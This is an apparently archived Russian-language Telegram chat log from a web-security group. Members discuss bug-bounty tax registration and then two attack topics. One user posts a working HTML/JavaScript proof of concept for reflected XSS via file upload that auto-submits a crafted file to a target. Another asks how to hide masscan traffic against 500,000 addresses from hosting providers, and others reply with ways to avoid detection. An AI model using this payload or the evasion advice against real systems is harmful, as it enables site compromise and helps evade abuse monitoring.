Size: a a a

2021 February 12

P

PP in WebPwnChat
источник

s

s̢̍̌͗ͧͫ͊ͧͫͮ̂̒̇̅̌̐͆́͡... in WebPwnChat
а, этого знаем)
источник

BF

Billy Fox in WebPwnChat
evilclippy
источник

m

margelet in WebPwnChat
Web Security
Советую патент, не нужна ни отчётность, ни учёт, ни первичка
На какой вид деятельности оформляете?
источник

CO

Cyber Opus in WebPwnChat
Green Dog
И что писать? За хсс в Гугле?)))
Тестирование ПО как вариант
источник

A

Anton in WebPwnChat
Green Dog
"Рефлетктед хсс в параметре х на сайте юзерконткнтгуугл.ком
Не, просто пишешь консультативные услуги независимого эксперта информационной безопасности
источник

WS

Web Security in WebPwnChat
margelet
На какой вид деятельности оформляете?
источник

m

margelet in WebPwnChat
Благодарю за ответ
источник

WS

Web Security in WebPwnChat
margelet
Благодарю за ответ
Нема за шо
источник

E

ENZ0_M4TR1X in WebPwnChat
ID:0
И так, еще один интересный кейс.

Представьте себе... Reflected XSS via File Upload.

На первый взгляд, кажется простой задачей. Но оказывается, что подсунуть пользователю отправку произвольного файла из браузера без действий пользователя не так уж просто.

Вспомним, нам нужно заставить пользователя открыть страницу, после из JS создать на странице форму с уже подставленным файлом, и после перенаправить его на уязвимую страницу вместе с загруженными данными. В этом случае нам ни как не помогут ни XMLHttpRequest, ни fetch, о которых вы сначала могли подумать.

В чем ключевая проблема? До недавнего времени вообще не было возможным подставить в поле input произвольный объект файла из кода JS.

Для содержания файлов объект input имеет поле input.files, которое представляет собой объект FileList. И до какого-то времени мы не могли его изменять (он считался immutable) и создавать кастомные FileList объекты, кроме возможности изменять его через объекты полученные из события DataTransferEvent (Т.е. когда юзер сам перетаскивал файлы на экран). Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS!!!

Пример эксплоита для такой уязвимости:


<!DOCTYPE html>
<html>
<body>
<form id="" action="https://example.com/convert-file" method="POST" enctype="multipart/form-data">
 <input id="file" type="file" name="file"/>
 "/>
</form>

<script>
 class _DataTransfer {
   constructor() {
    return new ClipboardEvent("").clipboardData || new DataTransfer();}
 }

 const input = document.querySelector('input');
 const file = new File(['<img onerror="alert(\'Domain: \'+document.domain+\'" src="x" />'],"name.html",{type:"text/html"})

 const dt = new _DataTransfer();

 dt.items.add(file)

 input.files = dt.files;

 document.forms[0].submit();
</script>
</body>
</html>


Надеюсь пригодится! Мне пригодилось;)
Почему я вижу везде одних и тех же людей?)
источник

S

Slava in WebPwnChat
ENZ0_M4TR1X
Почему я вижу везде одних и тех же людей?)
Ресурсы матрицы ограничены, кол-во нпс постоянно 🙄
источник

q

q|z in WebPwnChat
Slava
Ресурсы матрицы ограничены, кол-во нпс постоянно 🙄
симуляция в контейнерах, из одного образа всем раскатывают
источник

WS

Web Security in WebPwnChat
Как спрятать траф сканирования портов 80 и 443, чтобы мой хостинг не локнул дедик?
Если что, провайдеры у меня Linode и DigitalOcean
источник

WS

Web Security in WebPwnChat
Снизить скорость скана не подходит, я как раз использую masscan, чтобы чекнуть 500к адресов быстро
источник

BF

Billy Fox in WebPwnChat
Web Security
Как спрятать траф сканирования портов 80 и 443, чтобы мой хостинг не локнул дедик?
Если что, провайдеры у меня Linode и DigitalOcean
Хороший вопрос. Так-то обычное сканирование одного порта ничем не отличимо от попытки установления соединения с помощью прикладного софта... до момента, пока ты не получишь ответ от сервака, который сканируешь
источник

BF

Billy Fox in WebPwnChat
Тебе прилетит ACK и ты должен сразу передать какую-то инфу уровня протокола. Иначе, если ты сразу закрыть соединение попробуешь, будет палево. Это раз. Два - если юзаешь -sS, а не -sT, соединение останется "приоткрытым" и это тоже палево. Ну и третье - когда ломишься с одного хоста в кучу портов куда-то ещё, неважно, закрываешь ты соединение потом или нет, это палево уже стопроцентное
источник

BF

Billy Fox in WebPwnChat
Я думаю что тебе нужно просто найти хостера, который не против таких действий
источник

MY

Mikhail Yudin in WebPwnChat
Billy Fox
Тебе прилетит ACK и ты должен сразу передать какую-то инфу уровня протокола. Иначе, если ты сразу закрыть соединение попробуешь, будет палево. Это раз. Два - если юзаешь -sS, а не -sT, соединение останется "приоткрытым" и это тоже палево. Ну и третье - когда ломишься с одного хоста в кучу портов куда-то ещё, неважно, закрываешь ты соединение потом или нет, это палево уже стопроцентное
2 веб порта вроде не куча
источник

q

q|z in WebPwnChat
от netflow не спрячешься
источник

WS

Web Security in WebPwnChat
Mikhail Yudin
2 веб порта вроде не куча
2 порта не куча, но у меня таргетов 500к
источник